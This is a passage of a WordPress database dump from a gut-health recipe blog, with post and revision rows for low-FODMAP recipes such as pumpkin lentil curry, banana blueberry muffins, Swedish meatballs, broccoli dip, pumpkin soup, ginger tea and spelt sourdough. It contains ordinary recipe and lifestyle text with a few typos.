This recipe is from my book \"Tummy Revolution 21, Gut Health made simple\" which is a comprehensive 21 day plan to better gut health with over 50+ tummy friendly recipes and tools to help you on your way to better gut health. It\'s been featured in many magazines and newspapers with great reviews. You can find it on Amazon UK HERE, and US HERE or Australia HERE Take a look and hope you enjoy the recipe :)

\n\n\n\n

INGREDIENTS

\n\n\n\n
  • 500 ml (2 cups) diced pumpkin
  • 4 cm piece of ginger
  • 5 spring onions (green part only)
  • 1fresh chilli
  • 1 bunch fresh coriander
  • 2 tbsp garlic infused oil
  • 1 tsp mild curry powder
  • 1tsp turmeric
  • 1 tin (400g) chopped tomatoes
  • 1 tin (400g) coconut milk
  • 1tbsp tomato purée
  • 1 tbsp brown sugar (or maple syrup)
  • 1 tin (400g) lentils
  • 1 lime, juice of
  • Salt and pepper
  • pumpkin seeds for garnishing (optional)
\n\n\n\n

 
INSTRUCTIONS

\n\n\n\n

Chop the pumpkin into dice size pieces.

\n\n\n\n

Finely slice the chilli and the green part of the spring onion.

\n\n\n\n

Cut the ginger into matchstick-size pieces and then gather them in a row. Slice in the opposite direction.

\n\n\n\n

Chop up the coriander stalks and leave the leaves for later.

\n\n\n\n

Pour the garlic infused oil into a large saucepan and place on a high heat. Add the ginger and red chilli, then reduce to a medium heat. Cook until golden, then add the curry powder, coriander stalks and spring onion and fry for 1 minute.

\n\n\n\n

Add the turmeric, chopped tomatoes, tomato puree, brown sugar and coconut milk. Bring to the boil, then add the pumpkin. Reduce the heat, cover with a lid and simmer for 30 minutes. Add the lentils and let it simmer for another 20-30 minutes until it thickens. Stir occasionally and add some more water if it looks dry.

\n\n\n\n

Stir in the lime juice and season with salt and pepper.

\n\n\n\n

Sprinkle with some coriander leaves and serve with rice.

\n','Pumpkin & Lentil Curry','','inherit','closed','closed','','4662-revision-v1','','','2020-04-04 23:55:29','2020-04-04 23:55:29','',4662,'http://tummyrevolution.com/4662-revision-v1/',0,'revision','',0),(4664,1,'2020-04-12 03:30:06','2020-04-12 03:30:06','\n

Happy Autumn Everyone!

\n\n\n\n
\"\"/
\n\n\n\n

It\'s been a while since I posted anything on my website, blog or social media. Perhaps you\'ve noticed? I took a little break because I needed to regain some energy and new creativity and I felt the best way to do this is to take a total break from it all to enjoy summer, family, friends and nature. It\'s been one of my best summers ever and I\'ve come back with great energy and positivity!
I\'ve always felt as though autumn is the best time to start new things. I prefer to start new things autumn time rather then for example in the New Year. I have a lot of new ideas and projects for this autumn and I hope my new found energy will be reflected in what I do. I look forward to new great adventures and lots of good food for the gut.

Having been in the UK and Sweden over the summer, my healthy eating has slipped somewhat. I had some gorgeous local ice-creams in the Wales and the swedes make some great pastries and buns, with some gluten free versions. The temptation was just too big for me sometimes and I did treat myself from time to time. Now that I\'m back in Dubai I\'m trying to get back on track with my healthy eating again. To bridge the gap from buns and pastries to fruit I decided to make some healthier muffins. These banana and blueberry muffins are really nice and if I feel I need a treat I have one of these with a cup of tea. Is delicious!

I use maple syrup instead of sugar to get the sweetness but without the refined sugar. With the banana and the blueberries you don\'t really need any more sweetness. Although Honey is a natural sweetener I don\'t use it because it\'s high in fructose which means it could be malabsorbed in the small intestine and cause digestive issues. 

If you\'re trying to get back into a more healthy routine but still need a treat from time to time, I\'d recommend making these lovely muffins. you can freeze them for up to 3 months and just heat one up when you get a sweet craving.

\n\n\n\n

INGREDIENTS

2 eggs

\n\n\n\n

1/2 cup (125ml) lactose free plain yoghurt 

\n\n\n\n

2 medium ripe bananans (mashed)

1/2 (125ml) cup maple syrup

\n\n\n\n

1 tsp vanilla extract

\n\n\n\n

1 tsp baking soda

\n\n\n\n

1/2 tsp ground cinnamon

\n\n\n\n

3/4 (60g) oats

\n\n\n\n

1 cup (140g) gluten free flour mix

\n\n\n\n
\"\"/
\n\n\n\n

1 cup (140g) blueberries, fresh or frozen


INSTRUCTIONS 

\n\n\n\n

1 Preheat the oven to 175°C (350°F)

\n\n\n\n

2. Grease a muffin pan with either butter or cooking spray. (These muffins has a tendency of sticking to muffin cases so I avoid them in this case)

\n\n\n\n

3. In a mixing bowl, lightly beat the eggs util the yolks break apart and are mixed. Whisk in the yoghurt, bananas, maple syrup, vanilla, baking soda, cinnamon, and oats mixing until smooth.

\n\n\n\n

4. Gently stir in the flour and mix until combined. Add the blueberries and gently fold them in.

\n\n\n\n

5. Spoon in the mix evenly into the 12 muffin cups in the tray, filling them almost to the top.

\n\n\n\n

6. Bake in the middle of the oven for 20-22 minutes, or until slightly golden brown on top. Allow to cool for 5 minutes, then transfer to a wire rack to cool completely. Store in an airtight container for up to 5 days or freeze for up to 3 months.

\n\n\n\n

Enjoy!

\n\n\n\n
\"\"/
\n','Banana and Blueberry Muffins','','publish','open','open','','banana-and-blueberry-muffins','','','2020-04-12 23:02:11','2020-04-12 23:02:11','',0,'http://tummyrevolution.com/?p=4664',0,'post','',0),(4665,1,'2020-04-04 23:56:06','2020-04-04 23:56:06','\n

Happy Autumn Everyone!

\n\n\n\n
\"\"/
\n\n\n\n

It\'s been a while since I posted anything on my website, blog or social media. Perhaps you\'ve noticed? I took a little break because I needed to regain some energy and new creativity and I felt the best way to do this is to take a total break from it all to enjoy summer, family, friends and nature. It\'s been one of my best summers ever and I\'ve come back with great energy and positivity!
I\'ve always felt as though autumn is the best time to start new things. I prefer to start new things autumn time rather then for example in the New Year. I have a lot of new ideas and projects for this autumn and I hope my new found energy will be reflected in what I do. I look forward to new great adventures and lots of good food for the gut.

Having been in the UK and Sweden over the summer, my healthy eating has slipped somewhat. I had some gorgeous local ice-creams in the Wales and the swedes make some great pastries and buns, with some gluten free versions. The temptation was just too big for me sometimes and I did treat myself from time to time. Now that I\'m back in Dubai I\'m trying to get back on track with my healthy eating again. To bridge the gap from buns and pastries to fruit I decided to make some healthier muffins. These banana and blueberry muffins are really nice and if I feel I need a treat I have one of these with a cup of tea. Is delicious!

I use maple syrup instead of sugar to get the sweetness but without the refined sugar. With the banana and the blueberries you don\'t really need any more sweetness. Although Honey is a natural sweetener I don\'t use it because it\'s high in fructose which means it could be malabsorbed in the small intestine and cause digestive issues. 

If you\'re trying to get back into a more healthy routine but still need a treat from time to time, I\'d recommend making these lovely muffins. you can freeze them for up to 3 months and just heat one up when you get a sweet craving.

\n\n\n\n

INGREDIENTS

2 eggs

\n\n\n\n

1/2 cup (125ml) lactose free plain yoghurt 

\n\n\n\n

2 medium ripe bananans (mashed)

1/2 (125ml) cup maple syrup

\n\n\n\n

1 tsp vanilla extract

\n\n\n\n

1 tsp baking soda

\n\n\n\n

1/2 tsp ground cinnamon

\n\n\n\n

3/4 (60g) oats

\n\n\n\n

1 cup (140g) gluten free flour mix

\n\n\n\n
\"\"/
\n\n\n\n

1 cup (140g) blueberries, fresh or frozen


INSTRUCTIONS 

\n\n\n\n

1 Preheat the oven to 175°C (350°F)

\n\n\n\n

2. Grease a muffin pan with either butter or cooking spray. (These muffins has a tendency of sticking to muffin cases so I avoid them in this case)

\n\n\n\n

3. In a mixing bowl, lightly beat the eggs util the yolks break apart and are mixed. Whisk in the yoghurt, bananas, maple syrup, vanilla, baking soda, cinnamon, and oats mixing until smooth.

\n\n\n\n

4. Gently stir in the flour and mix until combined. Add the blueberries and gently fold them in.

\n\n\n\n

5. Spoon in the mix evenly into the 12 muffin cups in the tray, filling them almost to the top.

\n\n\n\n

6. Bake in the middle of the oven for 20-22 minutes, or until slightly golden brown on top. Allow to cool for 5 minutes, then transfer to a wire rack to cool completely. Store in an airtight container for up to 5 days or freeze for up to 3 months.

\n\n\n\n

Enjoy!

\n\n\n\n
\"\"/
\n','Banana and Blueberry Muffins','','inherit','closed','closed','','4664-revision-v1','','','2020-04-04 23:56:06','2020-04-04 23:56:06','',4664,'http://tummyrevolution.com/4664-revision-v1/',0,'revision','',0),(4666,1,'2020-04-12 03:25:40','2020-04-12 03:25:40','\n

Meatballs is Sweden\'s national dish and as I was born and raised in Sweden I do of course love this traditional meal. Swedish people still eat a lot of meatballs and it\'s not that hard to understand why as they taste really devine. My parents and family still live in Sweden so I spend a lot of time visiting them and I do love my mum\'s cooking when I\'m back. My mum is great as both cooking and baking and I like to learn from her. She makes great meatballs and because she\'s always used potatoes instead of breadcrumbs I thought her recipe would be great to use as a basis for my low-FODMAP/gut friendly meatballs. I just had to replaced the onions with chives, which works great (you can also use the green part of spring onions). I serve this with mashed potatoes and classic Swedish lingonberry (or cranberry jam). This is a great, tummy warming, family dish that everyone will love. The recipe is from my book ‘Tummy Revolution 21, Gut health made simple’ . If you like this recipe there’s lots more like this one in the book. It’s available on Amazon as an  ebook, paperback and hardback. Have a look here for more information about what’s included in the book

\n\n\n\n
\"\"/
\n\n\n\n

INGREDIENTS

500g beef mince

\n\n\n\n

2 medium size potatoes

\n\n\n\n

2 tbsp finely chopped chives

\n\n\n\n

1 egg

\n\n\n\n

1 1/2 tsp salt

\n\n\n\n

1 1/2 tsp black pepper

\n\n\n\n

60ml lactose free cream

\n\n\n\n

2 tbsp butter for frying

\n\n\n\n

FOR THE MASH

\n\n\n\n

2 large potatoes

\n\n\n\n

2 tbsp butter

\n\n\n\n

50 ml lactose free or almond milk

\n\n\n\n

OPTIONAL
Lingonberry or Cranberry jam to serve

\n\n\n\n

INSTRUCTIONS

\n\n\n\n

1. Preheat the oven to around 100ºC/37ºF.

\n\n\n\n

2. Peel the potatoes for both the meatballs and the mash and cut in half. Boil in water for about 15-20 minutes until soft.

\n\n\n\n

3. Leave the medium potatoes (for the meatballs) to cool, then grate.

\n\n\n\n

4. Meanwhile, mash the large potatoes and add the milk and butter. Keep the mash warm in a preheated oven until the meatballs are ready.

\n\n\n\n

5. Mix the mince, potatoes, chives, egg, salt, pepper and cream in a bowl.

\n\n\n\n

6. Shape the mix into balls.

\n\n\n\n

7. Melt the butter in a frying pan and add the meatballs. Cook on a high heat until brown all over, then reduce the heat and leave to cook for a few more minutes until cooked through.

\n\n\n\n
\"\"/
\n\n\n\n

8. Serve the meatballs with the mash and cranberry jam.

\n','Low FODMAP Swedish Meatballs','','publish','open','open','','low-fodmap-swedish-meatballs','','','2020-04-12 23:02:36','2020-04-12 23:02:36','',0,'http://tummyrevolution.com/?p=4666',0,'post','',0),(4667,1,'2020-04-04 23:56:40','2020-04-04 23:56:40','\n

Meatballs is Sweden\'s national dish and as I was born and raised in Sweden I do of course love this traditional meal. Swedish people still eat a lot of meatballs and it\'s not that hard to understand why as they taste really devine. My parents and family still live in Sweden so I spend a lot of time visiting them and I do love my mum\'s cooking when I\'m back. My mum is great as both cooking and baking and I like to learn from her. She makes great meatballs and because she\'s always used potatoes instead of breadcrumbs I thought her recipe would be great to use as a basis for my low-FODMAP/gut friendly meatballs. I just had to replaced the onions with chives, which works great (you can also use the green part of spring onions). I serve this with mashed potatoes and classic Swedish lingonberry (or cranberry jam). This is a great, tummy warming, family dish that everyone will love. The recipe is from my book ‘Tummy Revolution 21, Gut health made simple’ . If you like this recipe there’s lots more like this one in the book. It’s available on Amazon as an  ebook, paperback and hardback. Have a look here for more information about what’s included in the book

\n\n\n\n
\"\"/
\n\n\n\n

INGREDIENTS

500g beef mince

\n\n\n\n

2 medium size potatoes

\n\n\n\n

2 tbsp finely chopped chives

\n\n\n\n

1 egg

\n\n\n\n

1 1/2 tsp salt

\n\n\n\n

1 1/2 tsp black pepper

\n\n\n\n

60ml lactose free cream

\n\n\n\n

2 tbsp butter for frying

\n\n\n\n

FOR THE MASH

\n\n\n\n

2 large potatoes

\n\n\n\n

2 tbsp butter

\n\n\n\n

50 ml lactose free or almond milk

\n\n\n\n

OPTIONAL
Lingonberry or Cranberry jam to serve

\n\n\n\n

INSTRUCTIONS

\n\n\n\n

1. Preheat the oven to around 100ºC/37ºF.

\n\n\n\n

2. Peel the potatoes for both the meatballs and the mash and cut in half. Boil in water for about 15-20 minutes until soft.

\n\n\n\n

3. Leave the medium potatoes (for the meatballs) to cool, then grate.

\n\n\n\n

4. Meanwhile, mash the large potatoes and add the milk and butter. Keep the mash warm in a preheated oven until the meatballs are ready.

\n\n\n\n

5. Mix the mince, potatoes, chives, egg, salt, pepper and cream in a bowl.

\n\n\n\n

6. Shape the mix into balls.

\n\n\n\n

7. Melt the butter in a frying pan and add the meatballs. Cook on a high heat until brown all over, then reduce the heat and leave to cook for a few more minutes until cooked through.

\n\n\n\n
\"\"/
\n\n\n\n

8. Serve the meatballs with the mash and cranberry jam.

\n','Low FODMAP Swedish Meatballs','','inherit','closed','closed','','4666-revision-v1','','','2020-04-04 23:56:40','2020-04-04 23:56:40','',4666,'http://tummyrevolution.com/4666-revision-v1/',0,'revision','',0),(4668,1,'2020-04-12 03:20:00','2020-04-12 03:20:00','\n

I love guacamole but unfortunately avocado is one of those vegetables that can be a problem if you have a sensitive gut like me. Avocado contains high amounts of sorbitol, which might contribute to digestive symptoms. A serving of 1/8 of an avocado is generally tolerable and considered low FODMAP but if you\'re making guacamole you generally need more then an 1/8 of an avocado. This is where Broccomole saves the day!  This is by far one of the best low FODMAP dips I\'ve made. I must admit I was a bit sceptical at first at making this broccoli dip because it didn\'t sound that great to me but it\'s so tasty and great to dip you vegetable baton in. I hope you enjoy it as much as I do...

\n\n\n\n
\"\"/
\n\n\n\n

(My homegrown broccoli from a few years ago before moving to Dubai)

\n\n\n\n

Makes 3-4 Servings

\n\n\n\n

INGREDIENTS

200g (1 ½ cup) broccoli

\n\n\n\n

5 -6 spring onions (green part only)

\n\n\n\n

1 tsp lime juice

\n\n\n\n

50g (½ cup) feta cheese

\n\n\n\n

3 tbsp lactose free cream/milk or almond milk

\n\n\n\n

A pinch of chilli flakes

\n\n\n\n

1 tsp garlic infused oil

\n\n\n\n

A pinch of salt and pepper

\n\n\n\n

TO SERVE

\n\n\n\n

Vegetable batons

\n\n\n\n

INSTRUCTIONS

\n\n\n\n

1. Chop your broccoli into chunks.  Place it all in a microwave-safe bowl and put in the microwave until soft.  

\n\n\n\n

2. Add all ingredients (broccoli too!) into the mixer and blend until smooth.  

\n\n\n\n

3. Serve with vegetable batons or TR\'s Seeded Crisp Bread. 

\n\n\n\n

N.B. We like to serve it immediately when it is still a little warm but it can be kept in the fridge for a few days in an airtight container. 

\n\n\n\n
\"\"/
\n','Broccomoli dip Tummy friendly & Low FODMAP','','publish','open','open','','broccomoli-dip-tummy-friendly-low-fodmap','','','2020-04-12 23:02:43','2020-04-12 23:02:43','',0,'http://tummyrevolution.com/?p=4668',0,'post','',0),(4669,1,'2020-04-04 23:57:34','2020-04-04 23:57:34','\n

I love guacamole but unfortunately avocado is one of those vegetables that can be a problem if you have a sensitive gut like me. Avocado contains high amounts of sorbitol, which might contribute to digestive symptoms. A serving of 1/8 of an avocado is generally tolerable and considered low FODMAP but if you\'re making guacamole you generally need more then an 1/8 of an avocado. This is where Broccomole saves the day!  This is by far one of the best low FODMAP dips I\'ve made. I must admit I was a bit sceptical at first at making this broccoli dip because it didn\'t sound that great to me but it\'s so tasty and great to dip you vegetable baton in. I hope you enjoy it as much as I do...

\n\n\n\n
\"\"/
\n\n\n\n

(My homegrown broccoli from a few years ago before moving to Dubai)

\n\n\n\n

Makes 3-4 Servings

\n\n\n\n

INGREDIENTS

200g (1 ½ cup) broccoli

\n\n\n\n

5 -6 spring onions (green part only)

\n\n\n\n

1 tsp lime juice

\n\n\n\n

50g (½ cup) feta cheese

\n\n\n\n

3 tbsp lactose free cream/milk or almond milk

\n\n\n\n

A pinch of chilli flakes

\n\n\n\n

1 tsp garlic infused oil

\n\n\n\n

A pinch of salt and pepper

\n\n\n\n

TO SERVE

\n\n\n\n

Vegetable batons

\n\n\n\n

INSTRUCTIONS

\n\n\n\n

1. Chop your broccoli into chunks.  Place it all in a microwave-safe bowl and put in the microwave until soft.  

\n\n\n\n

2. Add all ingredients (broccoli too!) into the mixer and blend until smooth.  

\n\n\n\n

3. Serve with vegetable batons or TR\'s Seeded Crisp Bread. 

\n\n\n\n

N.B. We like to serve it immediately when it is still a little warm but it can be kept in the fridge for a few days in an airtight container. 

\n\n\n\n
\"\"/
\n','Broccomoli dip Tummy friendly & Low FODMAP','','inherit','closed','closed','','4668-revision-v1','','','2020-04-04 23:57:34','2020-04-04 23:57:34','',4668,'http://tummyrevolution.com/4668-revision-v1/',0,'revision','',0),(4670,1,'2020-04-12 03:15:30','2020-04-12 03:15:30','\n
\"\"/
\n\n\n\n

This is a bit of a treat breakfast/snack. It\'s quite sweet and I absolutely love it because I\'ve got a bit of a sweet tooth. If you want to make your topped toast refined sugar free, simply remove the brown sugar. Also, if you\'re on the low FODMAP diet you can\'t have too much of this as it will push your FODMAP intake over the recommended amount.

I think this works as a great alternative to a pastry or cake and tase really good accompanied with a cup of tea or coffee.

\n\n\n\n

Makes 1 Serving

\n\n\n\n

INGREDIENTS

1 banana (green to ripe but not overripe)

\n\n\n\n

1 slice of wheat or gluten free bread

\n\n\n\n

1 tsp of butter

\n\n\n\n

A pinch of cinnamon

\n\n\n\n

A pinch of brown sugar

\n\n\n\n

1 tsp maple syrup

INSTRUCTIONS

\n\n\n\n

1.  Preheat the oven to 175ºC/350ºF.

\n\n\n\n

2. Butter the bread. 

\n\n\n\n

3. Slice the banana and place it on top of the buttered bread. 

\n\n\n\n

4. Sprinkle the cinnamon, brown sugar and maple syrup over the banana evenly. 

\n\n\n\n

5.  Place the topped bread into the oven for 10 mins (until the banana slices start to brown).  

\n\n\n\n
\"\"/
\n','Topped Toast low FODMAP Treat','','publish','open','open','','topped-toast-low-fodmap-treat','','','2020-04-12 23:02:51','2020-04-12 23:02:51','',0,'http://tummyrevolution.com/?p=4670',0,'post','',0),(4671,1,'2020-04-04 23:58:30','2020-04-04 23:58:30','\n
\"\"/
\n\n\n\n

This is a bit of a treat breakfast/snack. It\'s quite sweet and I absolutely love it because I\'ve got a bit of a sweet tooth. If you want to make your topped toast refined sugar free, simply remove the brown sugar. Also, if you\'re on the low FODMAP diet you can\'t have too much of this as it will push your FODMAP intake over the recommended amount.

I think this works as a great alternative to a pastry or cake and tase really good accompanied with a cup of tea or coffee.

\n\n\n\n

Makes 1 Serving

\n\n\n\n

INGREDIENTS

1 banana (green to ripe but not overripe)

\n\n\n\n

1 slice of wheat or gluten free bread

\n\n\n\n

1 tsp of butter

\n\n\n\n

A pinch of cinnamon

\n\n\n\n

A pinch of brown sugar

\n\n\n\n

1 tsp maple syrup

INSTRUCTIONS

\n\n\n\n

1.  Preheat the oven to 175ºC/350ºF.

\n\n\n\n

2. Butter the bread. 

\n\n\n\n

3. Slice the banana and place it on top of the buttered bread. 

\n\n\n\n

4. Sprinkle the cinnamon, brown sugar and maple syrup over the banana evenly. 

\n\n\n\n

5.  Place the topped bread into the oven for 10 mins (until the banana slices start to brown).  

\n\n\n\n
\"\"/
\n','Topped Toast low FODMAP Treat','','inherit','closed','closed','','4670-revision-v1','','','2020-04-04 23:58:30','2020-04-04 23:58:30','',4670,'http://tummyrevolution.com/4670-revision-v1/',0,'revision','',0),(4672,1,'2020-04-12 03:15:10','2020-04-12 03:15:10','\n
\"\"/
\n\n\n\n

Soups are great for any occasion if you ask me and with so many soups to choose from you can have different once all year around. The good thing with soups is that the they can be very soothing for your tummy... if they contain the right ingredients. Some ingredients such as onion, garlic, celery can trigger digestive symptoms for some. This is why using stock can be a bit tricky. Although stock can be a great addition to a soup, it does often contain onion or garlic, which you may need to avoid if you have a sensitive gut. This pumpkin soup is great because it doesn’t require any stock and is very easy to make. 

Pumpkin is a highly nutrient-dense food. It is rich in vitamins and minerals but low in calories. Pumpkin is one of those vegetables I discovered when I started out on the low-FODMAP diet a few years ago. I didn’t use it much in my cooking perviously but now I add it to all sorts of dishes. It’s great in curries and soups and I find roasted pumpkin is really nice in salads or as a side dish. This creamy pumpkin soup is soothing for your tummy and loaded with some delicious topping it\'s one delicious meal.

MAKES 3-4 SERVINGS
INGREDIENTS

\n\n\n\n

400ml coconut milk

\n\n\n\n

500g pumpkin (chopped into chunks

\n\n\n\n

2 carrots (grated)

\n\n\n\n

6 spring onion (green part only)

\n\n\n\n

2 tbsp garlic infused olive oil

\n\n\n\n

1/2 a lemon

\n\n\n\n

1/2 tsp salt

\n\n\n\n

1/2 tsp pepper

\n\n\n\n

FOR THE TOPPING
(optional)

1/2 carrot, grated

\n\n\n\n

1 tbsp pumpkin seeds

\n\n\n\n

A few mint leaves

\n\n\n\n

Parmesan roasted chickpeas

Red cabbage

\n\n\n\n

INSTRUCTIONS

\n\n\n\n
  1. Heat the oil in a saucepan over a medium heat
  2. Add the pumpkin, spring onion and carrot and cook for about 5 minutes
  3. Pour in the coconut milk and bring to a simmer
  4. Place the lid on the pan and leave to cook until the veg are soft (approximately. 30 minutes)
  5. Add the salt, pepper and juice of the lemon
  6. Remove from the heat and mix until smooth, using a hand blender 
  7. Pour the soup into a bowl and top with grated carrot,red cabbage, Parmesan roasted chickpeas, mint and pumpkin seeds
\n\n\n\n

SERVE IMMEDIATELY

\n','Creamy Low FODMAP Pumpkin Soup','','publish','open','open','','creamy-low-fodmap-pumpkin-soup','','','2020-04-12 23:03:05','2020-04-12 23:03:05','',0,'http://tummyrevolution.com/?p=4672',0,'post','',0),(4673,1,'2020-04-04 23:59:10','2020-04-04 23:59:10','\n
\"\"/
\n\n\n\n

Soups are great for any occasion if you ask me and with so many soups to choose from you can have different once all year around. The good thing with soups is that the they can be very soothing for your tummy... if they contain the right ingredients. Some ingredients such as onion, garlic, celery can trigger digestive symptoms for some. This is why using stock can be a bit tricky. Although stock can be a great addition to a soup, it does often contain onion or garlic, which you may need to avoid if you have a sensitive gut. This pumpkin soup is great because it doesn’t require any stock and is very easy to make. 

Pumpkin is a highly nutrient-dense food. It is rich in vitamins and minerals but low in calories. Pumpkin is one of those vegetables I discovered when I started out on the low-FODMAP diet a few years ago. I didn’t use it much in my cooking perviously but now I add it to all sorts of dishes. It’s great in curries and soups and I find roasted pumpkin is really nice in salads or as a side dish. This creamy pumpkin soup is soothing for your tummy and loaded with some delicious topping it\'s one delicious meal.

MAKES 3-4 SERVINGS
INGREDIENTS

\n\n\n\n

400ml coconut milk

\n\n\n\n

500g pumpkin (chopped into chunks

\n\n\n\n

2 carrots (grated)

\n\n\n\n

6 spring onion (green part only)

\n\n\n\n

2 tbsp garlic infused olive oil

\n\n\n\n

1/2 a lemon

\n\n\n\n

1/2 tsp salt

\n\n\n\n

1/2 tsp pepper

\n\n\n\n

FOR THE TOPPING
(optional)

1/2 carrot, grated

\n\n\n\n

1 tbsp pumpkin seeds

\n\n\n\n

A few mint leaves

\n\n\n\n

Parmesan roasted chickpeas

Red cabbage

\n\n\n\n

INSTRUCTIONS

\n\n\n\n
  1. Heat the oil in a saucepan over a medium heat
  2. Add the pumpkin, spring onion and carrot and cook for about 5 minutes
  3. Pour in the coconut milk and bring to a simmer
  4. Place the lid on the pan and leave to cook until the veg are soft (approximately. 30 minutes)
  5. Add the salt, pepper and juice of the lemon
  6. Remove from the heat and mix until smooth, using a hand blender 
  7. Pour the soup into a bowl and top with grated carrot,red cabbage, Parmesan roasted chickpeas, mint and pumpkin seeds
\n\n\n\n

SERVE IMMEDIATELY

\n','Creamy Low FODMAP Pumpkin Soup','','inherit','closed','closed','','4672-revision-v1','','','2020-04-04 23:59:10','2020-04-04 23:59:10','',4672,'http://tummyrevolution.com/4672-revision-v1/',0,'revision','',0),(4674,1,'2020-04-12 03:10:00','2020-04-12 03:10:00','\n

Working out what drinks to have when you have a sensitive tummy can be a bit tricky.
There are plenty of tummy friendly teas to choose from such as:

\n\n\n\n
  • Peppermint tea
  • Green tea
  • White tea
  • Black tea
\n\n\n\n
\"\"/
\n\n\n\n

I also love orange and ginger tea. It\'s tummy soothing and refreshing. It also has anti-inflammatory antioxidants and antibacterial properties, which can help relieve stomach irritations, nausea and headaches. It\'s also great if you feel like you\'re coming down with a cold, just like I feel at the moment.

\n\n\n\n


Makes 2 cups, Minutes 5, Difficulty 2/10

INGREDIENTS

\n\n\n\n
  • 500ml (2 cups) water
  • the juice of 1 orange
  • 1 tsp freshly grated or dry ginger
  • 2 mint sprigs
  • 1 tbsp maple syrup (optional)

\n\n\n\n

INSTRUCTIONS

1. In a saucepan, bring the water to a boil.

\n\n\n\n

2. Cut the orange in half and cut one slice to use for garnish.

\n\n\n\n

3. Squeeze the juice out of one orange.

\n\n\n\n

4. Grate the ginger (if you are using fresh).

\n\n\n\n

5. Add the remaining ingredients to the boiling water and let it simmer for a minute or two.

\n\n\n\n

6. Serve in a cup and garnish with the orange slice and mint.

\n\n\n\n
\"\"/
\n','Orange Ginger Mint Tea + other tummy friendly teas','','publish','open','open','','orange-ginger-mint-tea','','','2020-04-15 16:34:18','2020-04-15 16:34:18','',0,'http://tummyrevolution.com/?p=4674',0,'post','',0),(4675,1,'2020-04-04 23:59:44','2020-04-04 23:59:44','\n

Working out what drinks to have when you have a sensitive tummy can be a bit tricky.
There are plenty of tummy friendly teas to choose from such as:

\n\n\n\n
  • Peppermint tea
  • Green tea
  • White tea
  • Black tea
\n\n\n\n
\"\"/
\n\n\n\n

I also love orange and ginger tea. It\'s tummy soothing and refreshing. It also has anti-inflammatory antioxidants and antibacterial properties, which can help relieve stomach irritations, nausea and headaches. It\'s also great if you feel like you\'re coming down with a cold, just like I feel at the moment.

\n\n\n\n


Makes 2 cups, Minutes 5, Difficulty 2/10

INGREDIENTS

\n\n\n\n
  • 500ml (2 cups) water
  • the juice of 1 orange
  • 1 tsp freshly grated or dry ginger
  • 2 mint sprigs
  • 1 tbsp maple syrup (optional)

\n\n\n\n

INSTRUCTIONS

1. In a saucepan, bring the water to a boil.

\n\n\n\n

2. Cut the orange in half and cut one slice to use for garnish.

\n\n\n\n

3. Squeeze the juice out of one orange.

\n\n\n\n

4. Grate the ginger (if you are using fresh).

\n\n\n\n

5. Add the remaining ingredients to the boiling water and let it simmer for a minute or two.

\n\n\n\n

6. Serve in a cup and garnish with the orange slice and mint.

\n\n\n\n
\"\"/
\n','Orange Ginger Mint Tea','','inherit','closed','closed','','4674-revision-v1','','','2020-04-04 23:59:44','2020-04-04 23:59:44','',4674,'http://tummyrevolution.com/4674-revision-v1/',0,'revision','',0),(4676,1,'2020-04-12 03:05:00','2020-04-12 03:05:00','\n

Good Morning!

\n\n\n\n


What a beautiful day it is in my part of the world today. 

This was my first spelt sourdough bread which took me 4 days to make. I remember the excitement setting out on my low FODMAP journey. It was was definitely a great way to start because its a delicious bread. It takes long to make because the dough needs to work its magic, but is actually quite easy to make as there is just a lot of resting time. It is also really tasty so it\'s worth the wait.

\n\n\n\n

Although Spelt is a medium/high FODMAP, the process of making sourdough will reduce fructans so Spelt sourdough bread is a low-FODMAP food.

\n\n\n\n


Sourdough Spelt Bread

Ingredients

\n\n\n\n
  • 900g wholemeal spelt flour
  • ¼ teaspoon salt
  • water
  • 40g olive oil
\n\n\n\n

Method

1. Mix together 100g/4oz flour & 100ml/4floz water. Cover with film and leave at room temperature for 24 hours.

2. Stir in another 100g/4oz flour & 100ml/4floz water. Cover with film and leave at room temperature for 48 hours.

3. Stir in 100g/4oz flour and 100ml/4floz water and leave in a warm place for 24 hours or until required for bread making.

4. Using a large bowl add 400g/1lb flour, oil, and salt to the existing mix
Mix in sufficient water to form a soft, slightly sticky dough.
Knead well then cover the dough with film and leave in a warm place for 1 hour.

\n\n\n\n

5. Knead the dough again then shape and put it into an oiled 1kg/2lb loaf tin.

\n\n\n\n

6. Set the oven to 220°C/Fan200

7. Cover the tin with film and leave in a warm place for 30 minutes.

\n\n\n\n

8. Bake in a pre heated oven for 30/35 minutes.

Serve with some spinach and softly poached egg and a little sea salt

Pop the spinach in a pan with a little water and stir until wilted, we then added some butter for extra flavour and a little bit of naughtiness.

Place a slice of spelt sourdough on a plate and top with wilted spinach, add a softly poached egg and finish with a sprinkling of sea salt

Now tuck in...... the runny egg is delicious with the firm texture of the bread and the spinach finishes off the flavour nicely . I Love it, this is definitely on my good breakfast recipe list.

\n\n\n\n
\"sourdough
\n\n\n\n
\"sourdough
\n\n\n\n
\"Sourdough
\n','Poached egg on spelt sourdough bread','','publish','open','open','','poached-egg-on-spelt-sourdough-bread','','','2020-04-12 23:03:48','2020-04-12 23:03:48','',0,'http://tummyrevolution.com/?p=4676',0,'post','',0),(4677,1,'2020-04-05 00:01:49','2020-04-05 00:01:49','\n

Good Morning!

\n\n\n\n


What a beautiful day it is in my part of the world today. 

This was my first spelt sourdough bread which took me 4 days to make. I remember the excitement setting out on my low FODMAP journey. It was was definitely a great way to start because its a delicious bread. It takes long to make because the dough needs to work its magic, but is actually quite easy to make as there is just a lot of resting time. It is also really tasty so it\'s worth the wait.

\n\n\n\n

Although Spelt is a medium/high FODMAP, the process of making sourdough will reduce fructans so Spelt sourdough bread is a low-FODMAP food.

\n\n\n\n


Sourdough Spelt Bread

Ingredients

\n\n\n\n
  • 900g wholemeal spelt flour
  • ¼ teaspoon salt
  • water
  • 40g olive oil
\n\n\n\n

Method

1. Mix together 100g/4oz flour & 100ml/4floz water. Cover with film and leave at room temperature for 24 hours.

2. Stir in another 100g/4oz flour & 100ml/4floz water. Cover with film and leave at room temperature for 48 hours.

3. Stir in 100g/4oz flour and 100ml/4floz water and leave in a warm place for 24 hours or until required for bread making.

4. Using a large bowl add 400g/1lb flour, oil, and salt to the existing mix
Mix in sufficient water to form a soft, slightly sticky dough.
Knead well then cover the dough with film and leave in a warm place for 1 hour.

\n\n\n\n

5. Knead the dough again then shape and put it into an oiled 1kg/2lb loaf tin.

\n\n\n\n

6. Set the oven to 220°C/Fan200

7. Cover the tin with film and leave in a warm place for 30 minutes.

\n\n\n\n

8. Bake in a pre heated oven for 30/35 minutes.

Serve with some spinach and softly poached egg and a little sea salt

Pop the spinach in a pan with a little water and stir until wilted, we then added some butter for extra flavour and a little bit of naughtiness.

